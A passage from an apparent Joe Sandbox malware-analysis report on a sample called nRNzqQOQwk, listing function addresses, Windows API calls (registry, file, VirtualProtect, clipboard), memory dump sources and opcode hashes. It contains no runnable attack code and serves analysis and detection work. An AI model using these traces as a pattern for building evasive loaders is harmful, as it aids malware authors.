                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                                            • Instruction ID: 5f6267e841dd840bf6295cbe1617e7a0042591bb1814ca2e8a4844537e2a2c78
                                                                            • Opcode Fuzzy Hash: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                                            • Instruction Fuzzy Hash: 67E04F31B001246BD7307AB10F8E97F10999BC4304B39153ABA01B62C6EDBC4C414AB9
                                                                            Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: PathSearch
                                                                            • String ID:
                                                                            • API String ID: 2203818243-0
                                                                            • Opcode ID: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                                            • Instruction ID: e4e3c42305c0b2198e0aecdca264a5a1b937f2a52f25dfaad176198492f8ea82
                                                                            • Opcode Fuzzy Hash: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                                            • Instruction Fuzzy Hash: CFE026B2304111AFE740DF68DE48EAA3B98DB10368F30453AF151F60C0E2BA9A41A769
                                                                            Function 00402BD8 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(00000000,00000662,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
                                                                            • Instruction ID: 12eae925539b7dc367c8ab6fa63785f67f6a0dd6345a275e5017c2f2efb43849
                                                                            • Opcode Fuzzy Hash: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
                                                                            • Instruction Fuzzy Hash: ADE0B676250108BEDB00EFA9EE4AE9977ECAB58740F108421B608E70A1C678E5508B69
                                                                            Function 00405A8B Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403135,00000000,00000000,00402F82,000000FF,00000004,00000000,00000000,00000000), ref: 00405A9F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                            • Instruction ID: 3049aa00f6096361bf05a549768cb7fbda67778921cce1d2793645b00ea59393
                                                                            • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                            • Instruction Fuzzy Hash: 56E08C3260521ABBEF119E508C40EEB3B6CEB043A0F008933F914E2180E230E8219FE4
                                                                            Function 00405ABA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030EB,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405ACE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                            • Instruction ID: 32d48f6e8b76b53ead5095efbfc7dc84fe3b04974c76bcad3a7819726962f715
                                                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                            • Instruction Fuzzy Hash: CEE0B63261429AABDF109E659C40AAB7B6CFF05360F148533B915E6150E231E8219EA5
                                                                            Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                            • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                            • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                            • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                            Function 00402336 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402369
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID:
                                                                            • API String ID: 1096422788-0
                                                                            • Opcode ID: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
                                                                            • Instruction ID: 863d308e192ce4c0f66b0ae01519e0470cfafd3cecd099ef988cf845eccf6abb
                                                                            • Opcode Fuzzy Hash: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
                                                                            • Instruction Fuzzy Hash: D1E08630A04208BADB10AFA08F09EAD3A79AF41710F24003AF9507B0D1EAB84481DB2D
                                                                            Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
                                                                            • Instruction ID: 089d8403b4a3c67af6c4af196b8dedf915adbd4a042e4b2ee6fd832a67879694
                                                                            • Opcode Fuzzy Hash: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
                                                                            • Instruction Fuzzy Hash: 34D05B72704115DBDB10DBE5EB0869D77A0AB40364F304537D151F21D0D2BADA559719
                                                                            Function 00403138 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,0002FFE4), ref: 00403146
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                            Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
                                                                            • Instruction ID: a8a1054ff6e124a16992140d9831d4e67a861e682019e3b6a28de944f62df8e5
                                                                            • Opcode Fuzzy Hash: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
                                                                            • Instruction Fuzzy Hash: B5D05E73B141519BD750EBB8BAC445E77E4EB403257304837E502E2091E67989429618

                                                                            Non-executed Functions

                                                                            Function 004050F7 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405156
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405165
                                                                            • GetClientRect.USER32(?,?), ref: 004051A2
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004051A9
                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051CA
                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051DB
                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 004051EE
                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 004051FC
                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040520F
                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405231
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405245
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405266
                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405276
                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040528F
                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040529B
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405174
                                                                              • Part of subcall function 00403FBA: SendMessageA.USER32(00000028,?,00000001,00403DEB), ref: 00403FC8
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052B7
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000508B,00000000), ref: 004052C5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004052CC
                                                                            • ShowWindow.USER32(00000000), ref: 004052EF
                                                                            • ShowWindow.USER32(?,00000008), ref: 004052F6
                                                                            • ShowWindow.USER32(00000008), ref: 0040533C
                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                            • CreatePopupMenu.USER32 ref: 00405381
                                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405396
                                                                            • GetWindowRect.USER32(?,000000FF), ref: 004053B6
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053CF
                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040540B
                                                                            • OpenClipboard.USER32(00000000), ref: 0040541B
                                                                            • EmptyClipboard.USER32 ref: 00405421
                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 0040542A
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405434
                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405448
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405461
                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 0040546C
                                                                            • CloseClipboard.USER32 ref: 00405472
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
